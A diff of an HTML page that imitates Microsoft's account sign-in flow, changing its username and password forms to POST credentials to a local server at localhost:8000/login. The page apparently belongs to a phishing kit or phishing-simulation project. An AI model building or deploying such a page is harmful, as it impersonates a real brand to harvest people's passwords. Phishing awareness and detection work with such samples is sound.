--- a/index.html
+++ b/index.html
@@ -1,79 +1,69 @@
-<!DOCTYPE html>
+<!doctype html>
 <html lang="en">
-
 <head>
-    <meta charset="UTF-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="icon" href="assets/favicon.ico" />
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width,initial-scale=1">
+    <link rel="icon" href="http://localhost:8000/assets/favicon.ico" />
     <title>Sign in to your Microsoft account</title>
-    <link rel="stylesheet" href="assets/app.css" />
+    <link rel="stylesheet" href="http://localhost:8000/assets/app.css" />
 </head>
-
-<body>
+<body class="auth-page">
     <section id="section_uname">
         <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" />
-            <h2 class="title mb-16 mt-16">Sign in</h2>
-            <form>
-                <div class="mb-16">
-                    <p id="error_uname" class="error"></p>
-                    <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email, phone, or Skype" />
+            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" />
+            <h2 class="mt-16 mb-16 title">Sign in</h2>
+
+            <form method="POST" action="http://localhost:8000/login">
+                <input type="hidden" name="_token" value="CwtDBuczgLRqm9ieXiZnHsaWKzTWKWN9a45hpLqt" autocomplete="off">                <div class="mb-16">
+                                        <input id="inp_uname" type="text" name="email" class="input" placeholder="Email, phone, or Skype" value="" required autofocus />
+                </div>
+                <div>
+                    <button class="btn" id="btn_next" type="submit">Next</button>
                 </div>
             </form>
+
             <div>
-                <p class="mb-16 fs-13">No account? <a href="" class="link">Create one!</a></p>
+                <p class="mb-16 fs-13">No account? <a href="#" class="link">Create one!</a></p>
                 <p class="mb-16 fs-13">
                     <a href="#" class="link">Sign in with a security key
-                        <img src="assets/question.png" alt="Question img">
+                        <img src="http://localhost:8000/assets/question.png" alt="Question img">
                     </a>
                 </p>
             </div>
-            <div>
-                <button class="btn" id="btn_next">Next</button>
-            </div>
         </div>
         <div class="opts">
-            <p class="has-icon mb-0" style="font-size:15px;"><span class="icon"><img src="assets/key.png"
-                        width="30px" /></span> Sign-in options</p>
+            <p class="mb-0 has-icon" style="font-size:15px;"><span class="icon"><img src="http://localhost:8000/assets/key.png" width="30px" /></span> Sign-in options</p>
         </div>
     </section>
 
     <section id="section_pwd" class="d-none">
         <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
-            <div class="identity w-100 mt-16 mb-16">
+            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" class="d-block" />
+            <div class="mt-16 mb-16 identity w-100">
                 <button class="back">
-                    <img src="assets/back.png" />
+                    <img src="http://localhost:8000/assets/back.png" />
                 </button>
-                <span id="user_identity">a@b.com</span>
+                <span id="user_identity">user@example.com</span>
             </div>
-            <h2 class="title mb-16">Enter password</h2>
-            <form>
-                <div class="mb-16">
-                    <p id="error_pwd" class="error"></p>
-                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
+            <h2 class="mb-16 title">Enter password</h2>
+            <form method="POST" action="http://localhost:8000/login">
+                <input type="hidden" name="_token" value="CwtDBuczgLRqm9ieXiZnHsaWKzTWKWN9a45hpLqt" autocomplete="off">                <div class="mb-16">
+                                        <input id="inp_pwd" type="password" name="password" class="input" placeholder="Password" />
+                </div>
+                <div>
+                    <button class="btn" id="btn_sig" type="submit">Sign in</button>
                 </div>
             </form>
-            <div>
-                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
-                <p class="mb-16">
-                    <a href="#" class="link fs-13">Other ways to sign in</a>
-                </p>
-            </div>
-            <div>
-                <button class="btn" id="btn_sig">Sign in</button>
-            </div>
         </div>
     </section>
 
     <section id="section_final" class="d-none">
         <div class="auth-wrapper">
-            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
-            <div class="identity w-100 mt-16 mb-16">
-                <span id="user_identity">a@b.com</span>
+            <img src="http://localhost:8000/assets/logo.png" alt="Microsoft" class="d-block" />
+            <div class="mt-16 mb-16 identity w-100">
+                <span id="user_identity">user@example.com</span>
             </div>
-            <h2 class="title mb-16">Stay signed in?</h2>
+            <h2 class="mb-16 title">Stay signed in?</h2>
             <p class="p">Stay signed in so you don't have to sign in again next time.</p>
             <label class="has-checkbox">
                 <input type="checkbox" class="checkbox" />
@@ -81,7 +71,7 @@
             </label>
             <div class="btn-group">
                 <button class="btn btn-sec" id="btn_final">No</button>
-                <button class="btn" id="btn_final">Yes</button>
+                <button class="btn" id="btn_final_yes">Yes</button>
             </div>
         </div>
     </section>
@@ -90,7 +80,6 @@
         <a href="#">Privacy & cookies</a>
         <span>.&nbsp;.&nbsp;.</span>
     </footer>
-    <script src="assets/app.js"></script>
+    <script src="http://localhost:8000/assets/app.js"></script>
 </body>
-
 </html>
